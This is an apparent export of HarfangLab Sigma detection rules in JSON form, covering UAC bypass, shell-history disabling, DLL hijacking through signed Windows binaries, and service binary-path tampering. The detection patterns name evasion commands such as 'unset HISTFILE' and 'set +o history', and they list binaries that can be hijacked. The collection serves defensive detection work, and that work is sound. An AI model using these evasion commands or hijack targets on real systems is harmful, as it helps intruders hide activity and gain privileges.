"rule_description": "Detects a process being spawned by eventvwr.exe.\nEventvwr.exe does not normally spawn any process, this action is probably the result of an UAC bypass attempt.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\nIt is recommended to investigate the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2021-01-04",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9d367155-ba9c-41bb-b835-4aff6b06be37",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611739Z",
"creation_date": "2026-03-23T11:45:34.611743Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611750Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md",
"https://attack.mitre.org/techniques/T1070/003/"
],
"name": "t1070_003_disable_history_file_linux.yml",
"content": "title: Shell History File Disabled\nid: 9d367155-ba9c-41bb-b835-4aff6b06be37\ndescription: |\n Detects the shell history file being disabled.\n Attackers may disable the shell history to hide the actions undertaken during an intrusion.\n It is recommended to investigate the parent process for other suspicious actions.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md\n - https://attack.mitre.org/techniques/T1070/003/\ndate: 2023/01/03\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.003\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_commandline:\n CommandLine|contains:\n - 'unset HISTFILE'\n - 'export HISTFILESIZE=0'\n\n # echo 'set +o history' >> ~/.bashrc\n selection_bashrc:\n CommandLine|contains|all:\n - 'set +o history'\n - '.bashrc'\n\n condition: 1 of selection_*\nlevel: high\n#level: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9d367155-ba9c-41bb-b835-4aff6b06be37",
"rule_name": "Shell History File Disabled",
"rule_description": "Detects the shell history file being disabled.\nAttackers may disable the shell history to hide the actions undertaken during an intrusion.\nIt is recommended to investigate the parent process for other suspicious actions.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9d77db37-0fd9-4f9a-8810-227bf3e3dba3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091882Z",
"creation_date": "2026-03-23T11:45:34.091883Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091888Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msiinfo.yml",
"content": "title: DLL Hijacking via MsiInfo.exe\nid: 9d77db37-0fd9-4f9a-8810-227bf3e3dba3\ndescription: |\n Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiInfo.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/04\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MsiInfo.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\msi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9d77db37-0fd9-4f9a-8810-227bf3e3dba3",
"rule_name": "DLL Hijacking via MsiInfo.exe",
"rule_description": "Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiInfo.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-04",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9d965041-1ded-463b-8d40-a6c515dd2f80",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075415Z",
"creation_date": "2026-03-23T11:45:34.075417Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075421Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe",
"https://attack.mitre.org/techniques/T1574/011/"
],
"name": "t1574_011_cmd_registered_as_service_path.yml",
"content": "title: Service Binary Path Modified to cmd.exe\nid: 9d965041-1ded-463b-8d40-a6c515dd2f80\ndescription: |\n Detects the modification of a service's binary path to point to cmd.exe.\n Attackers can modify a service binPath to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\n It is recommended to investigate the file pointed to by the new binary path to determine the legitimacy of this action.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe\n - https://attack.mitre.org/techniques/T1574/011/\ndate: 2022/12/23\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.011\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\\\*\\ImagePath'\n Details|endswith: 'cmd.exe'\n\n exclusion_cybereason:\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\CybereasonTI\\ImagePath'\n Details: '?:\\Program Files\\Cybereason ActiveProbe\\ActiveConsole\\CrEX3.exe*?:\\windows\\system32\\cmd.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9d965041-1ded-463b-8d40-a6c515dd2f80",
"rule_name": "Service Binary Path Modified to cmd.exe",
"rule_description": "Detects the modification of a service's binary path to point to cmd.exe.\nAttackers can modify a service binPath to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\nIt is recommended to investigate the file pointed to by the new binary path to determine the legitimacy of this action.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9da1e50d-8816-4c2f-a3f0-3d0e1965cb26",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594860Z",
"creation_date": "2026-03-23T11:45:34.594864Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594888Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_systemsettingsremovedevice.yml",
"content": "title: DLL Hijacking via SystemSettingsRemoveDevice.exe\nid: 9da1e50d-8816-4c2f-a3f0-3d0e1965cb26\ndescription: |\n Detects potential Windows DLL Hijacking via SystemSettingsRemoveDevice.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'SystemSettingsRemoveDevice.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\dui70.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9da1e50d-8816-4c2f-a3f0-3d0e1965cb26",
"rule_name": "DLL Hijacking via SystemSettingsRemoveDevice.exe",
"rule_description": "Detects potential Windows DLL Hijacking via SystemSettingsRemoveDevice.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9dd6a5c1-3a12-4223-b36e-4fe69eb7a91e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592923Z",
"creation_date": "2026-03-23T11:45:34.592927Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592934Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://twitter.com/StopMalvertisin/status/1687741617711820800?t=KgdZvNrfpQ0LQ0S3k_QjLQ&s=19",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wsatconfig.yml",
"content": "title: DLL Hijacking via wsatconfig.exe\nid: 9dd6a5c1-3a12-4223-b36e-4fe69eb7a91e\ndescription: |\n Detects potential Windows DLL Hijacking via wsatconfig.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://twitter.com/StopMalvertisin/status/1687741617711820800?t=KgdZvNrfpQ0LQ0S3k_QjLQ&s=19\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/08/22\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wsatconfig.exe'\n ImageLoaded|endswith: '\\sysglobl.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\Microsoft.NET\\Framework\\v*\\'\n - '?:\\Windows\\Microsoft.NET\\Framework64\\v*\\'\n - '?:\\Windows\\Microsoft.NET\\assembly\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\Microsoft.NET\\Framework\\v*\\'\n - '?:\\Windows\\Microsoft.NET\\Framework64\\v*\\'\n - '?:\\Windows\\Microsoft.NET\\assembly\\'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9dd6a5c1-3a12-4223-b36e-4fe69eb7a91e",
"rule_name": "DLL Hijacking via wsatconfig.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wsatconfig.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-08-22",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9e1a1a4d-470d-4a6b-a253-bc8772d2410b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588745Z",
"creation_date": "2026-03-23T11:45:34.588749Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588757Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rdpsauachelper.yml",
"content": "title: DLL Hijacking via rdpsauachelper.exe\nid: 9e1a1a4d-470d-4a6b-a253-bc8772d2410b\ndescription: |\n Detects potential Windows DLL Hijacking via rdpsauachelper.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rdpsauachelper.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9e1a1a4d-470d-4a6b-a253-bc8772d2410b",
"rule_name": "DLL Hijacking via rdpsauachelper.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rdpsauachelper.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9e1ebf81-bb2e-42dc-885c-9369dfefad84",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081594Z",
"creation_date": "2026-03-23T11:45:34.081596Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081601Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mdmdiagnosticstool.yml",
"content": "title: DLL Hijacking via mdmdiagnosticstool.exe\nid: 9e1ebf81-bb2e-42dc-885c-9369dfefad84\ndescription: |\n Detects potential Windows DLL Hijacking via mdmdiagnosticstool.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mdmdiagnosticstool.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\DMCmnUtils.dll'\n - '\\dmEnrollEngine.DLL'\n - '\\dmiso8601utils.dll'\n - '\\DynamoAPI.dll'\n - '\\iri.dll'\n - '\\MdmDiagnostics.dll'\n - '\\omadmapi.dll'\n - '\\policymanager.dll'\n - '\\tbs.dll'\n - '\\USERENV.dll'\n - '\\WINHTTP.dll'\n - '\\WININET.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9e1ebf81-bb2e-42dc-885c-9369dfefad84",
"rule_name": "DLL Hijacking via mdmdiagnosticstool.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mdmdiagnosticstool.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9e465662-94b6-4aa5-a6b8-523e0ed2f673",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078337Z",
"creation_date": "2026-03-23T11:45:34.078339Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078344Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mrt.yml",
